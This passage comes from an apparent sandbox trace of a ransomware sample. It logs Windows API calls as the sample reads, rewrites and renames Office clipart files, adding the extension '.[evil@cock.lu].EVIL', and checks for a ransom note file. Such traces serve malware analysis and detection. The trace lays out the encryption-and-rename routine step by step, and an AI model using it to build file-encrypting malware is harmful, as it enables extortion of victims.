hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x1cc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1cc0, lpOverlapped=0x0) returned 1 [0161.872] CloseHandle (hObject=0x1a8) returned 1 [0161.873] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_08.MID", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.873] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.873] __uncaught_exception () returned 0x84b1160800 [0161.873] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.873] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_08.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_08.mid"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_08.MID.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_08.mid.[evil@cock.lu].evil")) returned 1 [0161.874] ??_V@YAXPEAX@Z () returned 0x1 [0161.877] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_08.MID", dwFileAttributes=0x200) returned 0 [0161.877] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.877] wcsstr (_Str="PARNT_09.MID", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.877] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 69 [0161.877] wcscmp (_String1="PARNT_09.MID", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.877] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PARNT_09.MID") returned 0x0 [0161.877] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_09.MID") returned 0x45 [0161.877] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_09.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_09.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.879] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1a6c, lpOverlapped=0x0) returned 1 [0161.890] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.890] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.890] _errno () returned 0x84b1160840 [0161.890] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.890] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x1a80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1a80, lpOverlapped=0x0) returned 1 [0161.891] CloseHandle (hObject=0x1a8) returned 1 [0161.891] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_09.MID", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.891] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.891] __uncaught_exception () returned 0x84b1160800 [0161.891] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.891] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_09.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_09.mid"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_09.MID.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_09.mid.[evil@cock.lu].evil")) returned 1 [0161.893] ??_V@YAXPEAX@Z () returned 0x1 [0161.896] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_09.MID", dwFileAttributes=0x200) returned 0 [0161.896] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.896] wcsstr (_Str="PARNT_10.MID", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.896] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 69 [0161.896] wcscmp (_String1="PARNT_10.MID", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.896] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PARNT_10.MID") returned 0x0 [0161.896] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 0x45 [0161.896] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_10.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_10.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.898] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1511, lpOverlapped=0x0) returned 1 [0161.905] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.905] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.905] _errno () returned 0x84b1160840 [0161.905] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.905] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x1520, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1520, lpOverlapped=0x0) returned 1 [0161.905] CloseHandle (hObject=0x1a8) returned 1 [0161.906] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_10.MID", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.906] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.906] __uncaught_exception () returned 0x84b1160800 [0161.906] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.906] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_10.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_10.mid"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_10.MID.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_10.mid.[evil@cock.lu].evil")) returned 1 [0161.907] ??_V@YAXPEAX@Z () returned 0x1 [0161.910] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_10.MID", dwFileAttributes=0x200) returned 0 [0161.910] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.910] wcsstr (_Str="PE00013_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.910] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00013_.WMF") returned 69 [0161.910] wcscmp (_String1="PE00013_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.910] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE00013_.WMF") returned 0x0 [0161.910] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00013_.WMF") returned 0x45 [0161.910] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00013_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00013_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.913] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x6140, lpOverlapped=0x0) returned 1 [0161.920] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.920] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.920] _errno () returned 0x84b1160840 [0161.920] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.920] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x6160, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6160, lpOverlapped=0x0) returned 1 [0161.920] CloseHandle (hObject=0x1a8) returned 1 [0161.920] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00013_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.921] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.921] __uncaught_exception () returned 0x84b1160800 [0161.921] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.921] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00013_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00013_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00013_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00013_.wmf.[evil@cock.lu].evil")) returned 1 [0161.922] ??_V@YAXPEAX@Z () returned 0x1 [0161.925] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00013_.WMF", dwFileAttributes=0x200) returned 0 [0161.925] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.925] wcsstr (_Str="PE00014_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.925] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00014_.WMF") returned 69 [0161.925] wcscmp (_String1="PE00014_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.925] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE00014_.WMF") returned 0x0 [0161.925] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00014_.WMF") returned 0x45 [0161.925] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00014_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00014_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.927] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x411a, lpOverlapped=0x0) returned 1 [0161.934] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.934] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.934] _errno () returned 0x84b1160840 [0161.934] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.934] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x4120, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4120, lpOverlapped=0x0) returned 1 [0161.934] CloseHandle (hObject=0x1a8) returned 1 [0161.935] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00014_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.935] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.935] __uncaught_exception () returned 0x84b1160800 [0161.935] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.935] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00014_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00014_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00014_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00014_.wmf.[evil@cock.lu].evil")) returned 1 [0161.936] ??_V@YAXPEAX@Z () returned 0x1 [0161.939] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00014_.WMF", dwFileAttributes=0x200) returned 0 [0161.939] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.939] wcsstr (_Str="PE00034_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.939] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00034_.WMF") returned 69 [0161.939] wcscmp (_String1="PE00034_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.939] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE00034_.WMF") returned 0x0 [0161.939] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00034_.WMF") returned 0x45 [0161.939] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00034_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00034_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.941] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3d5c, lpOverlapped=0x0) returned 1 [0161.948] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.948] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.948] _errno () returned 0x84b1160840 [0161.948] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.948] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x3d60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3d60, lpOverlapped=0x0) returned 1 [0161.948] CloseHandle (hObject=0x1a8) returned 1 [0161.949] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00034_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.949] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.949] __uncaught_exception () returned 0x84b1160800 [0161.949] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.949] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00034_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00034_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00034_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00034_.wmf.[evil@cock.lu].evil")) returned 1 [0161.950] ??_V@YAXPEAX@Z () returned 0x1 [0161.953] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00034_.WMF", dwFileAttributes=0x200) returned 0 [0161.953] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.953] wcsstr (_Str="PE00049_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.953] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00049_.WMF") returned 69 [0161.953] wcscmp (_String1="PE00049_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.953] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE00049_.WMF") returned 0x0 [0161.953] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00049_.WMF") returned 0x45 [0161.953] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00049_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00049_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.955] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4040, lpOverlapped=0x0) returned 1 [0161.962] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.962] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.962] _errno () returned 0x84b1160840 [0161.962] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.962] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x4060, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4060, lpOverlapped=0x0) returned 1 [0161.963] CloseHandle (hObject=0x1a8) returned 1 [0161.963] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00049_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.963] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.963] __uncaught_exception () returned 0x84b1160800 [0161.963] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.963] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00049_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00049_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00049_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00049_.wmf.[evil@cock.lu].evil")) returned 1 [0161.964] ??_V@YAXPEAX@Z () returned 0x1 [0161.967] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00049_.WMF", dwFileAttributes=0x200) returned 0 [0161.967] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.967] wcsstr (_Str="PE00050_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.967] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00050_.WMF") returned 69 [0161.967] wcscmp (_String1="PE00050_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.967] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE00050_.WMF") returned 0x0 [0161.967] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00050_.WMF") returned 0x45 [0161.967] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00050_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00050_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.969] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4d18, lpOverlapped=0x0) returned 1 [0161.976] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.976] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.976] _errno () returned 0x84b1160840 [0161.977] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.977] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x4d20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4d20, lpOverlapped=0x0) returned 1 [0161.977] CloseHandle (hObject=0x1a8) returned 1 [0161.977] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00050_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.977] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.977] __uncaught_exception () returned 0x84b1160800 [0161.977] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.977] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00050_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00050_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00050_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00050_.wmf.[evil@cock.lu].evil")) returned 1 [0161.978] ??_V@YAXPEAX@Z () returned 0x1 [0161.981] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00050_.WMF", dwFileAttributes=0x200) returned 0 [0161.981] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.981] wcsstr (_Str="PE00052_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.981] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00052_.WMF") returned 69 [0161.981] wcscmp (_String1="PE00052_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.981] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE00052_.WMF") returned 0x0 [0161.981] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00052_.WMF") returned 0x45 [0161.981] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00052_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00052_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.984] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x47ec, lpOverlapped=0x0) returned 1 [0161.999] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.999] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.999] _errno () returned 0x84b1160840 [0161.999] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.999] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x4800, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4800, lpOverlapped=0x0) returned 1 [0161.999] CloseHandle (hObject=0x1a8) returned 1 [0162.000] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft 